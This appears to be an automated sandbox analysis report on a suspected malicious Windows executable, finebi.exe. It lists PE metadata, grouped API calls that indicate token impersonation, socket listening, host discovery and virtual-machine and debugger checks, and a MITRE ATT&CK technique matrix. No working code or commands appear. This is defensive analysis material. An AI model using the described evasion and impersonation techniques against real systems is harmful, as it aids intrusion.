Source: C:\Users\user\Desktop\finebi.exe: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: finebi.exe: Static PE information: Image base 0x140000000 > 0x60000000
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: finebi.exe: Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: finebi.exe: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: finebi.exe: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: finebi.exe: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: finebi.exe: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: finebi.exe: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: finebi.exe: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA91000 malloc, LoadLibraryA, FreeLibrary, GetProcAddress, GetModuleHandleA, VirtualAlloc, GetModuleHandleA, LoadLibraryA, GetProcAddress, memcpy, memset, VirtualFree, free

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9A880
Source: C:\Users\user\Desktop\finebi.exe: Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-14214
Source: C:\Users\user\Desktop\finebi.exe: API coverage: 7.0 %
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9A880
Source: C:\Windows\System32\conhost.exe: Last function: Thread delayed
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA95F00 malloc, memset, strncmp, GetCurrentDirectoryA, strncat_s, FindFirstFileA, GetLastError, free, free, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA96460 malloc, FindFirstFileA, free, malloc, malloc, free, free, FindNextFileA, FindClose
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.3058470832.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2682215947.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1801147348.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2425982853.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756372527.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1515959738.000001D8B6832000.00000004.00000020.00020000.00000000.sdmp: Binary or memory string: Hyper-V RAW
Source: finebi.exe, 00000000.00000002.3098831995.000001D8B67AC000.00000004.00000020.00020000.00000000.sdmp: Binary or memory string: Hyper-V RAW d
Source: C:\Users\user\Desktop\finebi.exe: API call chain: ExitProcess graph end node graph_0-13566
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB9158 IsProcessorFeaturePresent, memset, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA91000 malloc, LoadLibraryA, FreeLibrary, GetProcAddress, GetModuleHandleA, VirtualAlloc, GetModuleHandleA, LoadLibraryA, GetProcAddress, memcpy, memset, VirtualFree, free
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA93850 DeleteProcThreadAttributeList, GetProcessHeap, HeapFree
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB9158 IsProcessorFeaturePresent, memset, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB84D0 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB933C SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9F600 LogonUserA, ImpersonateLoggedOnUser, GetLastError, GetLastError
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA02F0 AllocateAndInitializeSid, CheckTokenMembership, FreeSid
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA96D80 memcpy, CreateNamedPipeA
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB901C GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9DBA0 GetUserNameA, GetComputerNameA, exit, gethostname, gethostbyname, GetModuleFileNameA, strrchr, GetProcAddress, GetModuleHandleA, GetProcAddress
Source: C:\Users\user\Desktop\finebi.exe: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA97C80 socket, htons, ioctlsocket, bind, listen, closesocket
MITRE ATT&CK matrix, listed by tactic (numbers in parentheses are the counts shown next to a technique in the matrix):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Native API (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: Valid Accounts (2), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: Valid Accounts (2), Access Token Manipulation (21), Process Injection (2), DLL Side-Loading (1), Network Logon Script, RC Scripts, Startup Items
Defense Evasion: Valid Accounts (2), Access Token Manipulation (21), Process Injection (2), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), DLL Side-Loading (1), Compile After Delivery
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: System Time Discovery (1), Security Software Discovery (131), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (3)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: Encrypted Channel (2), Non-Standard Port (1), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery